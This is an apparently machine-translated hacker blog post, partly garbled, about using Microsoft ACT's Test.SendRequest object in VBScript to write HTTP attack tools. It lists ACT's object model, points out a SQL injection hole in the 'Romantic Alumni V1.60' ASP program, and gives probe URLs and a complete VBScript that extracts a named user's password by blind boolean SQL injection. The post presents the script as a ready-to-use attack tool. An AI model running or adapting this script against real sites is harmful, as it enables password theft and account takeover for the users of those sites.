Intermediary transaction SEO diagnosis Taobao guest Cloud host technology Hall
Source: http://www.viphot.com/
I accidentally flipped a VBS script in the machine last night and suddenly found an object Test.sendrequest ("http://" & G_sserver & "/testfiles/browser.asp") that I hadn't seen before. Although the object has not been seen, the meaning is obvious: send an HTTP request. It was supposed to be the WMI Script API, but it didn't find the statement that created the object, and in Microsoft Act, Microsoft Act is a tool for testing sites in the Visual Studio.NET (Long, is this useful in the future?). If not, how do you look at this?), previously opened, but did not study how to use it, so I opened the Help file (checked MSDN has: Ms-help://ms. Vscc/ms. msdnvs.2052/act/htm/actml_main.htm), roughly read, unexpectedly is a complete set of HTTP client objects (do not know if this is not accurate), the object and attributes listed, you can see the following is the test object model, There is also a Creator object model, and if you have an interest in understanding, see MSDN, I am still learning:
-connection objects
Close method
Send method
IsOpen Property
Port Property
Redirectdepth Property
Server Properties
UseSSL Property
-cookie object//Because it is the test site, using a scripting program to simulate multi-user, this can be used to set the cookie for each user, that can be used to tamper with, hehe
Expires property
Name property
Path property
Value property
-cookies objects
Add method
Remove method
RemoveAll method
Count Property
Item Property
-header objects
Name property
Value property
-request objects
Body Property
CodePage Property
Encodebody Property
EncodeQueryAsUTF8 Property
Headers property
Httpversion Property
Path property
Responsebuffersize Property
Verb property
-response objects
The Body property//Gets the text of the HTTP response. Returns only the body part of the response buffer.
CodePage Property
Bytesrecv Property
BytesSent Property
ContentLength Property
Headers property
Headersize Property
Httpversion Property
Path property
Port Property
ResultCode Property
HTTP status Code
Server Properties
TTFB Property
Ttlb Property
UseSSL Property
-test objects
CreateConnection method
Createrequest method
Getcurrentuser method
Getglobalindex method
Getglobalvariable method
Getnextuser method
Incrementglobalindex method
SendRequest method
Setglobalindex method
Setglobalvariable method
Sleep method
Trace method
TraceLevel Property
-user objects
Cookies Properties
Name property
Password property
Here, you may think of a lot of useful things, such as test site, test server, test program, cookie forgery ... Look at your imagination, the first thing I'm interested in is the phrase that starts with: Test.sendrequest ("http://" & G_sserver & "/testfiles/browser.asp"), The SendRequest method Description of the test object:
Oresponse = Test.sendrequest (strURL)
Parameter: strURL As String: represents the requested URL
Return value: Oresponse as reponse: An object representing the response of a Web server responding to a request (that is, the response object above)
This object allows us to easily write 80-port attack programs, such as the snow-tracing function, now popular SQL injection, the network of SQL injection attacks are mostly written in Perl, I do not Perl, C Write a complete socket program is relatively cumbersome, is this object for the VBS provided the possibility, and the program is quite simple, although sacrificing efficiency, but for our rookie is a good way, here is an example to illustrate:
Romantic Alumni is a set of free ASP alumni program, perhaps you have not heard, but in the Alumni Class free web program is considered to be excellent, so there are many sites adopted or modified after the use of it (I have read the high school's website of the alumni is used in this set of procedures rewritten), I have V1.60, last year down from the internet down, write this article in the bedroom, not on the net, also can not get the latest version, anyway, just an example, on the use of it, hehe. Roughly read some code found that many places can be injected, the most obvious (because on the home page to see) Is it a forum form of the message board showthread.asp:
...
Topicid=request ("Rootid")
Sql= "Select Topic,hits from BBS where parentid=0 and bbsid=" &topicid
Set Rs=conn.execute (SQL)
...
Very old and classic one, hehe, try it:
Http://192.168.101.16/txl/ShowThread.asp?RootID=7%20and%201=1
http://192.168.101.16/txl/ShowThread.asp?RootID=7%20and%201=2
Data table structure I know that the user name can also be seen in the user list, then this example shows a guess the password, what? Too easy? Just an example, don't laugh oh ~ ~ Write time is not plain sailing ~ ~ Write very poor, especially in the cycle if the right to detect should exit the loop, But can not think how to quit (Break?exit?), but for the password stored in the program is enough, a 6-bit password used about 15 seconds to guess, improved will improve a lot, but the efficiency of the always and Perl can not be compared.
To use this object to install the Microsoft Act is a tool in Visual Studio.NET, I failed to register the associated DLL directly with REGSRV32 on another machine, so I still have to install it.
'*********************************************
' Romantic Alumni V1.60 Vulnerability test script by Luoluo
' Note: You need to install the ACT tool in Visual Studio.NET
'*********************************************
' ********************************** optimized, higher efficiency
Option Explicit
On Error Resume Next
Dim Test
Dim O_response
Dim wrong
Dim i,j,k
Dim Pwd_len
Dim pwd
Dim strings
Dim username
' The user name of the person to crack from the command line
If WScript.Arguments.Count > 0 Then
Username = wscript.arguments (0)
Else
Username = "Luoluo"
End If
WScript.Echo "Start probing, please wait ..."
' The logo on the right page, this random look, because as long as it is two pages returned to the different parts of the
wrong = "Luoluoisachinesehacker"
' Store password
PWD = ""
' The character range of the password
strings = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
' Set up objects
Set Test = CreateObject ("ACT. Test ")
' The length of the user's password
For i = 0 to 128 Step 1
' Send a request, return a response object, the address length can be divided into segments with &, so look some
Set o_response = Test.sendrequest ("http://192.168.101.16/txl/ShowThread.asp?") Rootid=7%20and%20exists%20 (Select%20userid%20from%20student%20where%20len (userpwd) = ' "& I &" '%20and% 20userid= ' "& Username &") "
' If the returned page has the correct flag, then the length is right.
If InStr (O_response.body, wrong) <> 0 Then
Pwd_len = "" & I & ""
Exit for
End If
Next
' Guess the user's password
For j = 1 to Pwd_len Step 1
For k = 1 to Len (strings) Step 1
Set o_response = Test.sendrequest ("http://192.168.101.16/txl/ShowThread.asp?") Rootid=7%20and%20exists%20 (Select%20userid%20from%20student%20where%20left (Userpwd, "& J &") = ' & pwd & Mid (strings,k,1) & "'%20and%20userid= '" & Username & "")
If InStr (O_response.body, wrong) <> 0 Then
PWD = pwd & Mid (strings,k,1)
Exit for
End If
Next
Next
If Err Then
WScript.Echo "Error:" & Error.description
Error.clear
Else
' Output password
WScript.Echo "Password:" & pwd
End If
Set Test = Nothing